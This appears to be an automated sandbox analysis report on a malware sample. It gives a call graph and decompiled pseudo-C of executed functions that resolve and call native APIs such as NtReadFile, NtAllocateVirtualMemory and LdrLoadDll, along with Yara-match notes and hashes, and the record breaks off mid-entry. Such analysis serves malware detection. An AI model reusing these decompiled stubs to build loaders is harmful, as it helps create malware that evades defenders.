12e9fe0 LdrInitializeThunk 33224->33227 33225 40d144 33225->33216 33227->33225 33229 409ca1 33228->33229 33230 409c9d 33228->33230 33231 409cec 33229->33231 33233 409cba 33229->33233 33230->32741 33275 417f50 LdrLoadDll 33231->33275 33274 417f50 LdrLoadDll 33233->33274 33234 409cfd 33234->32741 33236 409cdc 33236->32741 33238 40d200 3 API calls 33237->33238 33239 4133c6 33238->33239 33239->32743 33241 4079e9 33240->33241 33276 407710 33240->33276 33243 407a0d 33241->33243 33244 407710 19 API calls 33241->33244 33243->32745 33245 4079fa 33244->33245 33245->33243 33294 40d470 10 API calls 33245->33294 33248 4191e0 LdrLoadDll 33247->33248 33249 41879c 33248->33249 33413 12e98f0 LdrInitializeThunk 33249->33413 33250 40a772 33252 40d200 33250->33252 33253 40d21d 33252->33253 33414 418240 33253->33414 33255 40d265 33255->32749 33257 418290 2 API calls 33258 40d28e 33257->33258 33258->32749 33260 4182ac 33259->33260 33261 4191e0 LdrLoadDll 33259->33261 33420 12e9780 LdrInitializeThunk 33260->33420 33261->33260 33262 40a7d5 33262->32755 33262->32758 33265 4191e0 LdrLoadDll 33264->33265 33266 4182fc 33265->33266 33421 12e97a0 LdrInitializeThunk 33266->33421 33267 40a8a9 33267->32766 33270 4191e0 LdrLoadDll 33269->33270 33271 4180bc 33270->33271 33422 12e9a20 LdrInitializeThunk 33271->33422 33272 40a8fc 33272->32770 33274->33236 33275->33234 33277 406e20 4 API calls 33276->33277 33292 40772a 33277->33292 33278 4079b9 33278->33241 33279 4079af 33280 4070e0 2 API calls 33279->33280 33280->33278 33283 418180 2 API calls 33283->33292 33285 418710 LdrLoadDll NtClose 33285->33292 33288 40a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33288->33292 33291 4180a0 2 API calls 33291->33292 33292->33278 33292->33279 33292->33283 33292->33285 33292->33288 33292->33291 33295 417f90 33292->33295 33298 407540 33292->33298 33310 40d350 LdrLoadDll NtClose 33292->33310 33311 418010 LdrLoadDll 33292->33311 33312 418040 LdrLoadDll 33292->33312 33313 4180d0 LdrLoadDll 33292->33313 33314 407310 33292->33314 33330 405ea0 LdrLoadDll 33292->33330 33294->33243 33296 417fac 33295->33296 33297 4191e0 LdrLoadDll 33295->33297 33296->33292 33297->33296 33299 407556 33298->33299 33331 417b00 33299->33331 33301 4076e1 33301->33292 33302 40756f 33302->33301 33352 407120 33302->33352 33304 407655 33304->33301 33305 407310 11 API calls 33304->33305 33306 407683 33305->33306 33306->33301 33307 418180 2 API calls 33306->33307 33308 4076b8 33307->33308 33308->33301 33309 418780 2 API calls 33308->33309 33309->33301 33310->33292 33311->33292 33312->33292 33313->33292 33315 407339 33314->33315 33392 407280 33315->33392 33318 40734c 33319 418780 2 API calls 33318->33319 33320 4073d7 33318->33320 33323 4073d2 33318->33323 33400 40d3d0 33318->33400 33319->33318 33320->33292 33321 418710 2 API calls 33322 40740a 33321->33322 33322->33320 33324 417f90 LdrLoadDll 33322->33324 33323->33321 33325 40746f 33324->33325 33325->33320 33404 417fd0 33325->33404 33327 4074d3 33327->33320 33328 413a50 8 API calls 33327->33328 33329 407528 33328->33329 33329->33292 33330->33292 33332 41a270 2 API calls 33331->33332 33333 417b17 33332->33333 33359 408160 33333->33359 33335 417b32 33336 417b70 33335->33336 33337 417b59 33335->33337 33340 41a020 2 API calls 33336->33340 33338 41a0a0 2 API calls 33337->33338 33339 417b66 33338->33339 33339->33302 33341 417baa 33340->33341 33342 41a020 2 API calls 33341->33342 33343 417bc3 33342->33343 33349 417e64 33343->33349 33365 41a060 33343->33365 33346 417e50 33347 41a0a0 2 API calls 33346->33347 33348 417e5a 33347->33348 33348->33302 33350 41a0a0 2 API calls 33349->33350 33351 417eb9 33350->33351 33351->33302 33353 40721f 33352->33353 33354 407135 33352->33354 33353->33304 33354->33353 33355 413a50 8 API calls 33354->33355 33356 4071a2 33355->33356 33357 41a0a0 2 API calls 33356->33357 33358 4071c9 33356->33358 33357->33358 33358->33304 33360 408185 33359->33360 33361 409b40 LdrLoadDll 33360->33361 33362 4081b8 33361->33362 33364 4081dd 33362->33364 33368 40b340 33362->33368 33364->33335 33386 418800 33365->33386 33369 40b36c 33368->33369 33370 418460 LdrLoadDll 33369->33370 33371 40b385 33370->33371 33372 40b38c 33371->33372 33379 4184a0 33371->33379 33372->33364 33376 40b3c7 33377 418710 2 API calls 33376->33377 33378 40b3ea 33377->33378 33378->33364 33380 4184bc 33379->33380 33381 4191e0 LdrLoadDll 33379->33381 33385 12e9710 LdrInitializeThunk 33380->33385 33381->33380 33382 40b3af 33382->33372 33384 418a90 LdrLoadDll 33382->33384 33384->33376 33385->33382 33387 4191e0 LdrLoadDll 33386->33387 33388 41881c 33387->33388 33391 12e9a00 LdrInitializeThunk 33388->33391 33389 417e49 33389->33346 33389->33349 33391->33389 33393 407298 33392->33393 33394 409b40 LdrLoadDll 33393->33394 33395 4072b3 33394->33395 33396 413e50 LdrLoadDll 33395->33396 33397 4072c3 33396->33397 33398 4072cc PostThreadMessageW 33397->33398 33399 4072e0 33397->33399 33398->33399 33399->33318 33401 40d3e3 33400->33401 33407 418110 33401->33407 33405 417fec 33404->33405 33406 4191e0 LdrLoadDll 33404->33406 33405->33327 33406->33405 33408 4191e0 LdrLoadDll 33407->33408 33409 41812c 33408->33409 33412 12e9840 LdrInitializeThunk 33409->33412 33410 40d40e 33410->33318 33412->33410 33413->33250 33415 4191e0 LdrLoadDll 33414->33415 33416 41825c 33415->33416 33419 12e99a0 LdrInitializeThunk 33416->33419 33417 40d25e 33417->33255 33417->33257 33419->33417 33420->33262 33421->33267 33422->33272 33424 12e9540 LdrInitializeThunk

                                  Executed Functions

                                  Function 0041868A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 41868a-41868c 1 4186d7-4186d9 0->1 2 41868f-4186d5 call 4191e0 NtReadFile 0->2 2->1
                                  C-Code - Quality: 37%
                                  			E0041868A(void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				signed int _v117;
				void* _t15;
				void* _t29;
				void* _t30;
				intOrPtr* _t32;
				void* _t33;

				_t33 = ss;
				if(__eflags == 0) {
					_v117 =  !_v117;
					_t16 = _a4;
					_t32 = _a4 + 0xc48;
					E004191E0(_t29, _t16, _t32,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
					_t6 =  &_a40; // 0x413a31
					_t8 =  &_a32; // 0x413d72
					_t14 =  &_a8; // 0x413d72
					_t15 =  *((intOrPtr*)( *_t32))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36,  *_t6, _t30, _t33); // executed
				}
				return _t15;
			}









                                  0x0041868b
                                  0x0041868c
                                  0x0041868f
                                  0x00418693
                                  0x0041869f
                                  0x004186a7
                                  0x004186ac
                                  0x004186b2
                                  0x004186cd
                                  0x004186d5
                                  0x004186d5
                                  0x004186d9

                                  APIs
                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:A$r=A$r=A
                                  • API String ID: 2738559852-4243674446
                                  • Opcode ID: cdd0b196793e50f8b9f4954bfa91e4a05865ec030249a5c23353f1b5074c7126
                                  • Instruction ID: 3a026407efb5c7c3908f0cdb4655059b8a7fc547382bdd7f066258e72157c2b5
                                  • Opcode Fuzzy Hash: cdd0b196793e50f8b9f4954bfa91e4a05865ec030249a5c23353f1b5074c7126
                                  • Instruction Fuzzy Hash: 39F0F4B6200108AFCB14DF99DC85EEB77A9EF8C354F118249FE0DA7241CA34E951CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418690 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5 418690-4186a6 6 4186ac-4186d9 NtReadFile 5->6 7 4186a7 call 4191e0 5->7 7->6
                                  C-Code - Quality: 37%
                                  			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                  0x00418693
                                  0x0041869f
                                  0x004186a7
                                  0x004186ac
                                  0x004186b2
                                  0x004186cd
                                  0x004186d5
                                  0x00000000

                                  APIs
                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:A$r=A$r=A
                                  • API String ID: 2738559852-4243674446
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041883A Relevance: 1.5, APIs: 1, Instructions: 49memorynativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 262 41883a-41883c 263 4187d8-4187fd NtAllocateVirtualMemory 262->263 264 41883e-418856 262->264 265 41885c-418875 call 12e96e0 264->265 266 418857 call 4191e0 264->266 266->265
                                  C-Code - Quality: 44%
                                  			E0041883A(void* __eflags, intOrPtr _a4, intOrPtr* _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
				intOrPtr _v0;
				intOrPtr* _v4;
				intOrPtr* __esi;
				void* __ebp;
				void* _t14;
				long _t18;

				asm("repne in al, dx");
				if(__eflags > 0) {
					 *((intOrPtr*)(_t14 + 0xa)) =  *((intOrPtr*)(_t14 + 0xa)) + _t15;
					_t18 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
					return _t18;
				} else {
					__ebp = __esp;
					__eax = _v4;
					_t9 = __eax + 0xc68; // 0x10c68
					__esi = _t9;
					__eax = E004191E0(__edi, _v4, __esi,  *((intOrPtr*)(__eax + 0x10)), 0, 0x32);
					__edx = _a12;
					__eax = _a8;
					__edx = _v0;
					__eax =  *__esi;
					__eax =  *__eax(_a4, _a8, _a12, __esi, __ebp, 0x55, __ebp); // executed
					__esi = __edx;
					_pop(__ebp);
					return __eax;
				}
			}









                                  0x0041883a
                                  0x0041883c
                                  0x004187da
                                  0x004187f9
                                  0x004187fd
                                  0x0041883e
                                  0x00418841
                                  0x00418843
                                  0x0041884f
                                  0x0041884f
                                  0x00418857
                                  0x0041885c
                                  0x0041885f
                                  0x00418869
                                  0x0041886d
                                  0x00418871
                                  0x00418873
                                  0x00418874
                                  0x00418875
                                  0x00418875

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: a35d85eea9d5bdaf3945f2f61cafa922d56539f5a5088f80fbdc4dfd71912d77
                                  • Instruction ID: fbd88c388806d2352f766dd33cd0f10e0573a0ab3f55dc952fac234f78f8edd3
                                  • Opcode Fuzzy Hash: a35d85eea9d5bdaf3945f2f61cafa922d56539f5a5088f80fbdc4dfd71912d77
                                  • Instruction Fuzzy Hash: 0C0116B6200209AFDB14DF88DC81DEB77A9EF88754F118659FA1897241D631ED51CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409B40 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 270 409b40-409b69 call 41af70 273 409b6b-409b6e 270->273 274 409b6f-409b7d call 41b390 270->274 277 409b8d-409b9e call 419720 274->277 278 409b7f-409b8a call 41b610 274->278 283 409ba0-409bb4 LdrLoadDll 277->283 284 409bb7-409bba 277->284 278->277 283->284
                                  C-Code - Quality: 100%
                                  			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                  0x00409b5c
                                  0x00409b5f
                                  0x00409b64
                                  0x00409b69
                                  0x00409b73
                                  0x00409b78
                                  0x00409b7b
                                  0x00409b7d
                                  0x00409b85
                                  0x00409b8a
                                  0x00409b8a
                                  0x00409b91
                                  0x00409b99
                                  0x00409b9c
                                  0x00409b9e
                                  0x00409bb2
                                  0x00000000
                                  0x00409bb4
                                  0x00409bba
                                  0x00409b6e
                                  0x00409b6e
                                  0x00409b6e

                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004185E0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 285 4185e0-418631 call 4191e0 NtCreateFile
                                  C-Code - Quality: 100%
                                  			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                  0x004185ef
                                  0x004185f7
                                  0x0041862d
                                  0x00418631

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004187BB Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 288 4187bb-4187fd call 4191e0 NtAllocateVirtualMemory
                                  C-Code - Quality: 58%
                                  			E004187BB(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				void* _t11;
				long _t15;
				void* _t22;

				asm("out 0x41, eax");
				asm("scasd");
				asm("jecxz 0x2");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				_t11 = E004191E0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				 *((intOrPtr*)(_t11 + 0xa)) =  *((intOrPtr*)(_t11 + 0xa)) + _t11 + 0xa;
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}






                                  0x004187bb
                                  0x004187bd
                                  0x004187be
                                  0x004187c3
                                  0x004187cf
                                  0x004187d7
                                  0x004187da
                                  0x004187f9
                                  0x004187fd

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 422c28881e6c98ec1bbf9cad4759446bbdc139124385258cc025dc8bb7b4ef28
                                  • Instruction ID: 13f9e054c6157e8503caa56707d1aec48ef2e78e424b64724aa4be8ecc440d68
                                  • Opcode Fuzzy Hash: 422c28881e6c98ec1bbf9cad4759446bbdc139124385258cc025dc8bb7b4ef28
                                  • Instruction Fuzzy Hash: C7F058B1200219BBDB14DF89CC80EEB77ADEF88744F108159FA0897241C630F810CBE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004187C0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 292 4187c0-4187fd call 4191e0 NtAllocateVirtualMemory
                                  C-Code - Quality: 100%
                                  			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				void* _t11;
				long _t15;
				void* _t22;

				_t3 = _a4 + 0xc60; // 0xca0
				_t11 = E004191E0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				 *((intOrPtr*)(_t11 + 0xa)) =  *((intOrPtr*)(_t11 + 0xa)) + _t11 + 0xa;
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}






                                  0x004187cf
                                  0x004187d7
                                  0x004187da
                                  0x004187f9
                                  0x004187fd

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418710 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                  0x00418713
                                  0x00418716
                                  0x0041871f
                                  0x00418727
                                  0x00418735
                                  0x00418739

                                  APIs
                                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7db0bebb9f77f237483b74024dceb67a5fe438b1b5aa8d6cda341208a67de765
                                  • Instruction ID: 2ca27749ab350432bae8153686f5ecf850aa48e26d6415576d392057e59ab98b
                                  • Opcode Fuzzy Hash: 7db0bebb9f77f237483b74024dceb67a5fe438b1b5aa8d6cda341208a67de765
                                  • Instruction Fuzzy Hash: 839002B121100802D14071A944047464005A7D0341F52C025A6054554EC6998DD577A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e7b3aeed0462af9fb6c70bb1db16300739201c55bae664ee4f284fa127fe60f7
                                  • Instruction ID: 77c2f0b330aee9f2a7cfb9bfc38819dc29a5d9f8d787deca56673be801087d14
                                  • Opcode Fuzzy Hash: e7b3aeed0462af9fb6c70bb1db16300739201c55bae664ee4f284fa127fe60f7
                                  • Instruction Fuzzy Hash: 519002A135100842D10061A94414B064005E7E1341F52C029E2054554DC659CC527266
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: da3a35d5305babb32e2ed145ef91b5e88092c3f86df1d2c7c40d97f21b0337a9
                                  • Instruction ID: 47e00a0e9690807bede9ab0e8ca89ab9641b173ffb3c0c58bd537bf2ff92d76f
                                  • Opcode Fuzzy Hash: da3a35d5305babb32e2ed145ef91b5e88092c3f86df1d2c7c40d97f21b0337a9
                                  • Instruction Fuzzy Hash: 3D90027121100813D11161A945047074009A7D0281F92C426A1414558DD6968952B261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3f0e9e537d6a0b30fb4ad5fc7f1f4a9e386693de63ea1dd14b490c5bdf379145
                                  • Instruction ID: c58a63445c1d3176c2f0afe1e5341c9dc551ba6d76338ed46a76ac9647605210
                                  • Opcode Fuzzy Hash: 3f0e9e537d6a0b30fb4ad5fc7f1f4a9e386693de63ea1dd14b490c5bdf379145
                                  • Instruction Fuzzy Hash: E8900261252045525545B1A944046078006B7E0281B92C026A2404950CC5669856F761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 56dee8f700e7f27ecea800f8ddf121d5dbda2204bfb967c84ebab17975f61562
                                  • Instruction ID: 687100e76f82c98f8919f60653e3e82d0191555dcf0243ed30d70576ccac8f3f
                                  • Opcode Fuzzy Hash: 56dee8f700e7f27ecea800f8ddf121d5dbda2204bfb967c84ebab17975f61562
                                  • Instruction Fuzzy Hash: C990026161100902D10171A94404716400AA7D0281F92C036A2014555ECA658992B271
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
